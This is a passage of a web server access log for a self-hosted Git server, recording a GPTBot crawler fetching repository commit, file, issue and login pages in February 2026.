AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/commits/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/GoldMonitor/chromedriver.exe" +[17/Feb/2026:18:02:53 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commit/9a604cd56b83970def6bcd1b8d3b4de39430b5f6?files=PostgresMonitor%2fwatchdog.py" [Client 74.7.227.38] [Length 25244] [Gzip 6.18] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/commits/commit/9d6e7f0d3106a64cce13b59d4e9106978f69e584/PostgresMonitor/watchdog.py" +[17/Feb/2026:18:02:53 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/issues?labels=0&milestone=-1&state=closed&type=all" [Client 74.7.227.38] [Length 10196] [Gzip 3.46] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/issues?labels=0&milestone=-1&state=all&type=all" +[17/Feb/2026:18:02:54 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/issues?assignee=1&milestone=-1&state=open&type=all" [Client 74.7.227.38] [Length 10171] [Gzip 3.46] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/issues?assignee=1&milestone=-1&state=all&type=all" +[17/Feb/2026:18:02:54 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/pulls?assignee=%28any%29&state=open&type=all" [Client 74.7.227.38] [Length 9983] [Gzip 3.50] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/pulls" +[17/Feb/2026:18:02:55 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/C++Project/TestProject/build/CMakeFiles/TestApp.dir/main.cpp.o?display=rendered" [Client 74.7.227.38] [Length 11027] [Gzip 3.04] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/C++Project/TestProject/build/CMakeFiles/TestApp.dir/main.cpp.o" +[17/Feb/2026:18:02:55 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/c8dad27dda1488de178617d5b12c7f1dcbc93746/C++Project/TestProject/build/CMakeFiles/TestApp.dir/main.cpp.o?display=rendered" [Client 74.7.227.38] [Length 11028] [Gzip 3.04] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/c8dad27dda1488de178617d5b12c7f1dcbc93746/C++Project/TestProject/build/CMakeFiles/TestApp.dir/main.cpp.o" +[17/Feb/2026:18:02:56 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/aeec38c08f4b3b16e26a997a70d46a8d04e5896d/C++Project/TestProject/build/CMakeFiles/TestApp.dir/main.cpp.o?display=rendered" [Client 74.7.227.38] [Length 11026] [Gzip 3.04] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/aeec38c08f4b3b16e26a997a70d46a8d04e5896d/C++Project/TestProject/build/CMakeFiles/TestApp.dir/main.cpp.o" +[17/Feb/2026:18:02:56 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/8d46844ad0dee496f6e51052dc6f6f06f211c977/C++Project/TestProject/build/CMakeFiles/TestApp.dir/main.cpp.o?display=rendered" [Client 74.7.227.38] [Length 11023] [Gzip 3.04] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/8d46844ad0dee496f6e51052dc6f6f06f211c977/C++Project/TestProject/build/CMakeFiles/TestApp.dir/main.cpp.o" +[17/Feb/2026:18:02:57 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/C++Project/TestProject/build/CMakeFiles/TestApp.dir/main.cpp.o?display=rendered" [Client 74.7.227.38] [Length 11026] [Gzip 3.04] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/C++Project/TestProject/build/CMakeFiles/TestApp.dir/main.cpp.o" +[17/Feb/2026:18:02:57 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/C++Project/TestProject/build/CMakeFiles/TestApp.dir/main.cpp.o?display=rendered" [Client 74.7.227.38] [Length 11025] [Gzip 3.04] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/C++Project/TestProject/build/CMakeFiles/TestApp.dir/main.cpp.o" +[17/Feb/2026:18:02:58 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/9a604cd56b83970def6bcd1b8d3b4de39430b5f6/C++Project/TestProject/build/CMakeFiles/TestApp.dir/main.cpp.o?display=rendered" [Client 74.7.227.38] [Length 11026] [Gzip 3.04] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/9a604cd56b83970def6bcd1b8d3b4de39430b5f6/C++Project/TestProject/build/CMakeFiles/TestApp.dir/main.cpp.o" +[17/Feb/2026:18:02:58 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/01698e701c846122840ffbef6cfc9a5bdb7524ea/C++Project/TestProject/build/CMakeFiles/TestApp.dir/main.cpp.o?display=rendered" [Client 74.7.227.38] [Length 11024] [Gzip 3.04] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/01698e701c846122840ffbef6cfc9a5bdb7524ea/C++Project/TestProject/build/CMakeFiles/TestApp.dir/main.cpp.o" +[17/Feb/2026:18:02:59 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/C++Project/industrial-comm/build/cpp/CMakeFiles/CMakeDirectoryInformation.cmake?display=rendered" [Client 74.7.227.38] [Length 11126] [Gzip 3.11] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/C++Project/industrial-comm/build/cpp/CMakeFiles/CMakeDirectoryInformation.cmake" +[17/Feb/2026:18:02:59 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/c8dad27dda1488de178617d5b12c7f1dcbc93746/C++Project/industrial-comm/build/cpp/CMakeFiles/CMakeDirectoryInformation.cmake?display=rendered" [Client 74.7.227.38] [Length 11126] [Gzip 3.11] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/c8dad27dda1488de178617d5b12c7f1dcbc93746/C++Project/industrial-comm/build/cpp/CMakeFiles/CMakeDirectoryInformation.cmake" +[17/Feb/2026:18:03:00 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/9a604cd56b83970def6bcd1b8d3b4de39430b5f6/C++Project/industrial-comm/build/cpp/CMakeFiles/CMakeDirectoryInformation.cmake?display=rendered" [Client 74.7.227.38] [Length 11124] [Gzip 3.11] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/9a604cd56b83970def6bcd1b8d3b4de39430b5f6/C++Project/industrial-comm/build/cpp/CMakeFiles/CMakeDirectoryInformation.cmake" +[17/Feb/2026:18:03:01 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/c8dad27dda1488de178617d5b12c7f1dcbc93746/C++Project/industrial-comm/build/cpp/CMakeFiles/CMakeDirectoryInformation.cmake?display=source" [Client 74.7.227.38] [Length 11918] [Gzip 3.35] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/c8dad27dda1488de178617d5b12c7f1dcbc93746/C++Project/industrial-comm/build/cpp/CMakeFiles/CMakeDirectoryInformation.cmake" +[17/Feb/2026:18:03:01 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/9a604cd56b83970def6bcd1b8d3b4de39430b5f6/C++Project/industrial-comm/build/cpp/CMakeFiles/CMakeDirectoryInformation.cmake?display=source" [Client 74.7.227.38] [Length 11915] [Gzip 3.35] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/9a604cd56b83970def6bcd1b8d3b4de39430b5f6/C++Project/industrial-comm/build/cpp/CMakeFiles/CMakeDirectoryInformation.cmake" +[17/Feb/2026:18:03:02 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/src/branch/main/OpcUaMinimal/obj/Debug/net8.0/OpcUaMinimal.csproj.AssemblyReference.cache" [Client 74.7.227.38] [Length 11178] [Gzip 3.08] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/src/branch/main/OpcUaMinimal/obj/Debug/net8.0" +[17/Feb/2026:18:03:02 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/src/branch/main/OpcUaMinimal/obj/Debug/net8.0/OpcUaMinimal.csproj.CoreCompileInputs.cache" [Client 74.7.227.38] [Length 11351] [Gzip 3.09] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/src/branch/main/OpcUaMinimal/obj/Debug/net8.0" +[17/Feb/2026:18:03:03 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/0e583fb1c388c335fdaaff550f7c3bbed06ac0f2/C++Project/industrial-comm/CMakeLists.txt?display=rendered" [Client 74.7.227.38] [Length 10985] [Gzip 3.02] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0e583fb1c388c335fdaaff550f7c3bbed06ac0f2/C++Project/industrial-comm/CMakeLists.txt" +[17/Feb/2026:18:03:03 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/0e583fb1c388c335fdaaff550f7c3bbed06ac0f2/C++Project/industrial-comm/CMakeLists.txt?display=source" [Client 74.7.227.38] [Length 11373] [Gzip 3.11] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0e583fb1c388c335fdaaff550f7c3bbed06ac0f2/C++Project/industrial-comm/CMakeLists.txt" +[17/Feb/2026:18:03:04 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/4329e0f9218f6c9a721153ce90e89046f0dcbb83/C++Project/industrial-comm/src-old/old_controller.hpp?display=rendered" [Client 74.7.227.38] [Length 11063] [Gzip 3.04] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/4329e0f9218f6c9a721153ce90e89046f0dcbb83/C++Project/industrial-comm/src-old/old_controller.hpp" +[17/Feb/2026:18:03:04 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/9d6e7f0d3106a64cce13b59d4e9106978f69e584/C++Project/industrial-comm/src-old/old_controller.hpp?display=rendered" [Client 74.7.227.38] [Length 11063] [Gzip 3.04] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/9d6e7f0d3106a64cce13b59d4e9106978f69e584/C++Project/industrial-comm/src-old/old_controller.hpp" +[17/Feb/2026:18:03:05 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/83e7d939e386dd9b236553115441a2075fc8fe7f/C++Project/industrial-comm/src-old/old_controller.cpp?display=rendered" [Client 74.7.227.38] [Length 11064] [Gzip 3.04] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/83e7d939e386dd9b236553115441a2075fc8fe7f/C++Project/industrial-comm/src-old/old_controller.cpp" +[17/Feb/2026:18:03:05 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/3e4db647c22a7292965a613e62ce815b9da823a8/C++Project/industrial-comm/src-old/old_controller.cpp?display=rendered" [Client 74.7.227.38] [Length 11033] [Gzip 3.05] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/3e4db647c22a7292965a613e62ce815b9da823a8/C++Project/industrial-comm/src-old/old_controller.cpp" +[17/Feb/2026:18:03:06 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/9d6e7f0d3106a64cce13b59d4e9106978f69e584/C++Project/industrial-comm/src-old/old_controller.cpp?display=rendered" [Client 74.7.227.38] [Length 11064] [Gzip 3.04] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/9d6e7f0d3106a64cce13b59d4e9106978f69e584/C++Project/industrial-comm/src-old/old_controller.cpp" +[17/Feb/2026:18:03:06 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/4329e0f9218f6c9a721153ce90e89046f0dcbb83/C++Project/industrial-comm/src-old/old_controller.cpp?display=rendered" [Client 74.7.227.38] [Length 11063] [Gzip 3.04] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/4329e0f9218f6c9a721153ce90e89046f0dcbb83/C++Project/industrial-comm/src-old/old_controller.cpp" +[17/Feb/2026:18:03:07 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/83e7d939e386dd9b236553115441a2075fc8fe7f/C++Project/industrial-comm/src-old/old_controller.hpp?display=rendered" [Client 74.7.227.38] [Length 11064] [Gzip 3.04] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/83e7d939e386dd9b236553115441a2075fc8fe7f/C++Project/industrial-comm/src-old/old_controller.hpp" +[17/Feb/2026:18:03:07 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/commits/branch/main/OpcUaMinimal/obj/Debug/net8.0/OpcUaMinimal.csproj.AssemblyReference.cache" [Client 74.7.227.38] [Length 9862] [Gzip 2.88] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/src/branch/main/OpcUaMinimal/obj/Debug/net8.0/OpcUaMinimal.csproj.AssemblyReference.cache" +[17/Feb/2026:18:03:08 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/commits/branch/main/OpcUaMinimal/obj/Debug/net8.0/OpcUaMinimal.csproj.CoreCompileInputs.cache" [Client 74.7.227.38] [Length 9860] [Gzip 2.88] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/src/branch/main/OpcUaMinimal/obj/Debug/net8.0/OpcUaMinimal.csproj.CoreCompileInputs.cache" +[17/Feb/2026:18:03:08 +0000] - 303 303 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/_edit/main/OpcUaMinimal/obj/Debug/net8.0/OpcUaMinimal.csproj.CoreCompileInputs.cache" [Client 74.7.227.38] [Length 38] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/src/branch/main/OpcUaMinimal/obj/Debug/net8.0/OpcUaMinimal.csproj.CoreCompileInputs.cache" +[17/Feb/2026:18:03:09 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login" [Client 74.7.227.38] [Length 4851] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/_edit/main/OpcUaMinimal/obj/Debug/net8.0/OpcUaMinimal.csproj.CoreCompileInputs.cache" +[17/Feb/2026:18:03:09 +0000] - 303 303 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/_edit/main/OpcUaMinimal/obj/Debug/net8.0/OpcUaMinimal.csproj.AssemblyReference.cache" [Client 74.7.227.38] [Length 38] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/src/branch/main/OpcUaMinimal/obj/Debug/net8.0/OpcUaMinimal.csproj.AssemblyReference.cache" +[17/Feb/2026:18:03:09 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login" [Client 74.7.227.38] [Length 4849] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/_edit/main/OpcUaMinimal/obj/Debug/net8.0/OpcUaMinimal.csproj.AssemblyReference.cache" +[17/Feb/2026:18:03:09 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/raw/branch/main/OpcUaMinimal/obj/Debug/net8.0/OpcUaMinimal.csproj.CoreCompileInputs.cache" [Client 74.7.227.38] [Length 65] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/src/branch/main/OpcUaMinimal/obj/Debug/net8.0/OpcUaMinimal.csproj.CoreCompileInputs.cache" +[17/Feb/2026:18:03:10 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/raw/branch/main/OpcUaMinimal/obj/Debug/net8.0/OpcUaMinimal.csproj.AssemblyReference.cache" [Client 74.7.227.38] [Length 10456] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/src/branch/main/OpcUaMinimal/obj/Debug/net8.0/OpcUaMinimal.csproj.AssemblyReference.cache" +[17/Feb/2026:18:03:11 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/blame/branch/main/OpcUaMinimal/obj/Debug/net8.0/OpcUaMinimal.csproj.CoreCompileInputs.cache" [Client 74.7.227.38] [Length 10300] [Gzip 2.95] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/src/branch/main/OpcUaMinimal/obj/Debug/net8.0/OpcUaMinimal.csproj.CoreCompileInputs.cache" +[17/Feb/2026:18:03:11 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/rss/branch/main/OpcUaMinimal/obj/Debug/net8.0/OpcUaMinimal.csproj.AssemblyReference.cache" [Client 74.7.227.38] [Length 993] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/src/branch/main/OpcUaMinimal/obj/Debug/net8.0/OpcUaMinimal.csproj.AssemblyReference.cache" +[17/Feb/2026:18:03:12 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/rss/branch/main/OpcUaMinimal/obj/Debug/net8.0/OpcUaMinimal.csproj.CoreCompileInputs.cache" [Client 74.7.227.38] [Length 993] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/src/branch/main/OpcUaMinimal/obj/Debug/net8.0/OpcUaMinimal.csproj.CoreCompileInputs.cache" +[17/Feb/2026:18:03:12 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/3e4db647c22a7292965a613e62ce815b9da823a8/C++Project/industrial-comm/src-old/old_controller.hpp?display=rendered" [Client 74.7.227.38] [Length 11032] [Gzip 3.05] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/3e4db647c22a7292965a613e62ce815b9da823a8/C++Project/industrial-comm/src-old/old_controller.hpp" +[17/Feb/2026:18:03:13 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/issues?assignee=1&milestone=-1&state=all&type=all" [Client 74.7.227.38] [Length 10126] [Gzip 3.46] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/issues?assignee=1&state=all&type=all" +[17/Feb/2026:18:03:13 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/src/branch/main/.vscode/settings.json?display=source" [Client 74.7.227.38] [Length 11674] [Gzip 3.24] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/src/branch/main/.vscode/settings.json" +[17/Feb/2026:18:03:14 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c?files=PostgresPatrol%2fbuild%2fPostgresPatrol%2flocalpycs%2fpyimod02_importers.pyc" [Client 74.7.227.38] [Length 19826] [Gzip 3.56] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/commits/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/PostgresPatrol/build/PostgresPatrol/localpycs/pyimod02_importers.pyc" +[17/Feb/2026:18:03:14 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/3e4db647c22a7292965a613e62ce815b9da823a8/C++Project/industrial-comm/build/CMakeFiles/Makefile.cmake?display=source" [Client 74.7.227.38] [Length 14130] [Gzip 4.89] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/3e4db647c22a7292965a613e62ce815b9da823a8/C++Project/industrial-comm/build/CMakeFiles/Makefile.cmake" +[17/Feb/2026:18:03:15 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/e54b4e832455afb83987fc146872a66900dee5c0/C++Project/industrial-comm/build/CMakeFiles/cmake.check_cache?display=source" [Client 74.7.227.38] [Length 11158] [Gzip 3.04] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/e54b4e832455afb83987fc146872a66900dee5c0/C++Project/industrial-comm/build/CMakeFiles/cmake.check_cache" +[17/Feb/2026:18:03:15 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/4329e0f9218f6c9a721153ce90e89046f0dcbb83/C++Project/industrial-comm/build/CMakeFiles/cmake.check_cache?display=rendered" [Client 74.7.227.38] [Length 11059] [Gzip 3.07] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/4329e0f9218f6c9a721153ce90e89046f0dcbb83/C++Project/industrial-comm/build/CMakeFiles/cmake.check_cache" +[17/Feb/2026:18:03:16 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/9d6e7f0d3106a64cce13b59d4e9106978f69e584/C++Project/industrial-comm/build/CMakeFiles/cmake.check_cache?display=rendered" [Client 74.7.227.38] [Length 11061] [Gzip 3.07] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/9d6e7f0d3106a64cce13b59d4e9106978f69e584/C++Project/industrial-comm/build/CMakeFiles/cmake.check_cache" +[17/Feb/2026:18:03:16 +0000] - 303 303 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/_diffpatch/main/OpcUaMinimal/obj/Debug/net8.0/OpcUaMinimal.csproj.CoreCompileInputs.cache" [Client 74.7.227.38] [Length 38] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/blame/branch/main/OpcUaMinimal/obj/Debug/net8.0/OpcUaMinimal.csproj.CoreCompileInputs.cache" +[17/Feb/2026:18:03:17 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login" [Client 74.7.227.38] [Length 4851] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/_diffpatch/main/OpcUaMinimal/obj/Debug/net8.0/OpcUaMinimal.csproj.CoreCompileInputs.cache" +[17/Feb/2026:18:03:17 +0000] - 303 303 - GET https 